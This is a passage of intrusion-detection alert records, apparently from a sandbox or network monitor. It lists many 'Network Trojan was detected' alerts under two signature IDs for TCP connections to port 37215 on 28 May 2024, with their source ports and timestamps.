            SID:2829579
            Source Port:39952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321786
            SID:2835222
            Source Port:58462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336653
            SID:2835222
            Source Port:48702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054882
            SID:2835222
            Source Port:36418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853328
            SID:2835222
            Source Port:43516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065610
            SID:2829579
            Source Port:33140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.859591
            SID:2829579
            Source Port:33116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906374
            SID:2829579
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904457
            SID:2829579
            Source Port:33756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745800
            SID:2835222
            Source Port:37390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597602
            SID:2835222
            Source Port:45036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945079
            SID:2835222
            Source Port:58384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058085
            SID:2829579
            Source Port:54228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413025
            SID:2835222
            Source Port:48446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779568
            SID:2829579
            Source Port:51566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442263
            SID:2829579
            Source Port:56644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922149
            SID:2835222
            Source Port:58480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957089
            SID:2835222
            Source Port:42820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811471
            SID:2829579
            Source Port:55640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605396
            SID:2829579
            Source Port:41696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.227066
            SID:2835222
            Source Port:45836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919306
            SID:2835222
            Source Port:48854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999737
            SID:2829579
            Source Port:54764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079181
            SID:2835222
            Source Port:47142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222040
            SID:2829579
            Source Port:35052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926390
            SID:2829579
            Source Port:57194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.751652
            SID:2835222
            Source Port:53046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875340
            SID:2829579
            Source Port:38566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842641
            SID:2829579
            Source Port:41372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084355
            SID:2835222
            Source Port:33802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879503
            SID:2835222
            Source Port:33774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746953
            SID:2835222
            Source Port:40594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776816
            SID:2829579
            Source Port:59220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754580
            SID:2835222
            Source Port:49282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810288
            SID:2835222
            Source Port:56330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.998960
            SID:2829579
            Source Port:46774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869892
            SID:2829579
            Source Port:34996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730108
            SID:2835222
            Source Port:44000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012452
            SID:2835222
            Source Port:58176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436675
            SID:2835222
            Source Port:57256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.356853
            SID:2835222
            Source Port:55482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425980
            SID:2829579
            Source Port:36288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052765
            SID:2829579
            Source Port:34228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.549283
            SID:2835222
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816681
            SID:2829579
            Source Port:38090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827572
            SID:2835222
            Source Port:41448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860746
            SID:2829579
            Source Port:49852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717359
            SID:2829579
            Source Port:50730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294552
            SID:2835222
            Source Port:33912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965245
            SID:2829579
            Source Port:42678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086680
            SID:2835222
            Source Port:55080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046895
            SID:2829579
            Source Port:52706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.879217
            SID:2835222
            Source Port:57412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788941
            SID:2829579
            Source Port:45618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617964
            SID:2835222
            Source Port:34136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938036
            SID:2829579
            Source Port:57508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031714
            SID:2835222
            Source Port:49596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556547
            SID:2835222
            Source Port:42856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.940795
            SID:2829579
            Source Port:52716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335353
            SID:2829579
            Source Port:50068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052848
            SID:2835222
            Source Port:34450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573622
            SID:2829579
            Source Port:48176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848791
            SID:2829579
            Source Port:35230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064005
            SID:2835222
            Source Port:55564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563490
            SID:2835222
            Source Port:38448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854141
            SID:2835222
            Source Port:46164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920340
            SID:2835222
            Source Port:46454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887614
            SID:2829579
            Source Port:60394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470576
            SID:2829579
            Source Port:53326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821776
            SID:2829579
            Source Port:51404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772535
            SID:2835222
            Source Port:39548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901575
            SID:2829579
            Source Port:44310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470655
            SID:2829579
            Source Port:51626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279694
            SID:2829579
            Source Port:55022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857268
            SID:2829579
            Source Port:60384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374196
            SID:2829579
            Source Port:39282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.765351
            SID:2835222
            Source Port:57576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871194
            SID:2829579
            Source Port:59726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775945
            SID:2835222
            Source Port:60352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736597
            SID:2835222
            Source Port:41510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929017
            SID:2829579
            Source Port:52434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038399
            SID:2829579
            Source Port:56284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077828
            SID:2835222
            Source Port:48720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601884
            SID:2829579
            Source Port:41562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.657169
            SID:2835222
            Source Port:55552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.511348
            SID:2829579
            Source Port:42002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.939514
            SID:2829579
            Source Port:46090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.643819
            SID:2829579
            Source Port:46600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737282
            SID:2835222
            Source Port:55074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899852
            SID:2829579
            Source Port:45656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.594505
            SID:2829579
            Source Port:55244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734945
            SID:2829579
            Source Port:34562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934189
            SID:2829579
            Source Port:60886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.814494
            SID:2829579
            Source Port:55840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776862
            SID:2829579
            Source Port:49494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605278
            SID:2829579
            Source Port:35328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748413
            SID:2835222
            Source Port:44618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275070
            SID:2835222
            Source Port:47742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557222
            SID:2829579
            Source Port:51100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988745
            SID:2835222
            Source Port:60772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076812
            SID:2835222
            Source Port:42064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432477
            SID:2835222
            Source Port:35528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809397
            SID:2829579
            Source Port:35160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321348
            SID:2835222
            Source Port:39176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771546
            SID:2835222
            Source Port:38094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.861151
            SID:2829579
            Source Port:32940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300103
            SID:2829579
            Source Port:45028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.579029
            SID:2835222
            Source Port:48342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020388
            SID:2829579
            Source Port:38698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939045
            SID:2829579
            Source Port:37380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014469
            SID:2829579
            Source Port:40682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824762
            SID:2835222
            Source Port:36386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817083
            SID:2829579
            Source Port:42492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772986
            SID:2835222
            Source Port:33846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927343
            SID:2835222
            Source Port:58820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.831548
            SID:2835222
            Source Port:44884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012280
            SID:2835222
            Source Port:36482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313244
            SID:2835222
            Source Port:46046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850338
            SID:2835222
            Source Port:56212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843136
            SID:2829579
            Source Port:38438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.937772
            SID:2835222
            Source Port:53242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876219
            SID:2835222
            Source Port:54708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815138
            SID:2829579
            Source Port:52342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431011
            SID:2835222
            Source Port:60676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871361
            SID:2835222
            Source Port:57090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051921
            SID:2835222
            Source Port:56254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510351
            SID:2835222
            Source Port:54832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880492
            SID:2829579
            Source Port:38998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748700
            SID:2829579
            Source Port:59924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506825
            SID:2829579
            Source Port:53224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803598
            SID:2829579
            Source Port:48216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954332
            SID:2829579
            Source Port:56328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691579
            SID:2835222
            Source Port:53548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070152
            SID:2829579
            Source Port:49858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723879
            SID:2835222
            Source Port:55676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810693
            SID:2829579
            Source Port:57502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.988334
            SID:2829579
            Source Port:52534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737649
            SID:2829579
            Source Port:55292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804136
            SID:2829579
            Source Port:35346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436947
            SID:2829579
            Source Port:35044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470206
            SID:2829579
            Source Port:55216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047830
            SID:2835222
            Source Port:45910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344957
            SID:2829579
            Source Port:43862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923632
            SID:2829579
            Source Port:39336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855574
            SID:2829579
            Source Port:52428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937468
            SID:2829579
            Source Port:42936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505738
            SID:2829579
            Source Port:58474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817160
            SID:2835222
            Source Port:51030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620490
            SID:2829579
            Source Port:59180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743475
            SID:2835222
            Source Port:36756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945306
            SID:2835222
            Source Port:58328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821759
            SID:2835222
            Source Port:40708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891649
            SID:2829579
            Source Port:55452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771495
            SID:2835222
            Source Port:37128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278016
            SID:2835222
            Source Port:37548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.230965
            SID:2829579
            Source Port:52104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.551871
            SID:2829579
            Source Port:36194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027883
            SID:2829579
            Source Port:33830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077976
            SID:2835222
            Source Port:34588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069751
            SID:2829579
            Source Port:59898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952917
            SID:2835222
            Source Port:60158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423160
            SID:2829579
            Source Port:38320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756525
            SID:2835222
            Source Port:55274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735039
            SID:2835222
            Source Port:51212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026469
            SID:2835222
            Source Port:50538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868156
            SID:2835222
            Source Port:35272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760184
            SID:2829579
            Source Port:47862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669747
            SID:2829579
            Source Port:48706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.440633
            SID:2829579
            Source Port:58956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.951603
            SID:2829579
            Source Port:54814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955524
            SID:2829579
            Source Port:40668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584017
            SID:2835222
            Source Port:50622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.848872
            SID:2835222
            Source Port:56190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.924242
            SID:2829579
            Source Port:58062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303522
            SID:2829579
            Source Port:54674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018818
            SID:2829579
            Source Port:36604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336083
            SID:2829579
            Source Port:45028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260746
            SID:2829579
            Source Port:52494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333186
            SID:2829579
            Source Port:42040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034182
            SID:2835222
            Source Port:46354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848277
            SID:2835222
            Source Port:49530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026265
            SID:2829579
            Source Port:42136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506676
            SID:2829579
            Source Port:45188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745388
            SID:2829579
            Source Port:54828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893939
            SID:2829579
            Source Port:50360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382623
            SID:2835222
            Source Port:33960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989607
            SID:2835222
            Source Port:46932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263092
            SID:2835222
            Source Port:36720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.403856
            SID:2835222
            Source Port:41716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.599703
            SID:2835222
            Source Port:39096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000172
            SID:2829579
            Source Port:58568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.607582
            SID:2835222
            Source Port:49708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573529
            SID:2835222
            Source Port:59448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871464
            SID:2835222
            Source Port:41086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378140
            SID:2835222
            Source Port:55506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045109
            SID:2835222
            Source Port:60588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792445
            SID:2829579
            Source Port:34612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861319
            SID:2829579
            Source Port:60002
            Destination Port:37215
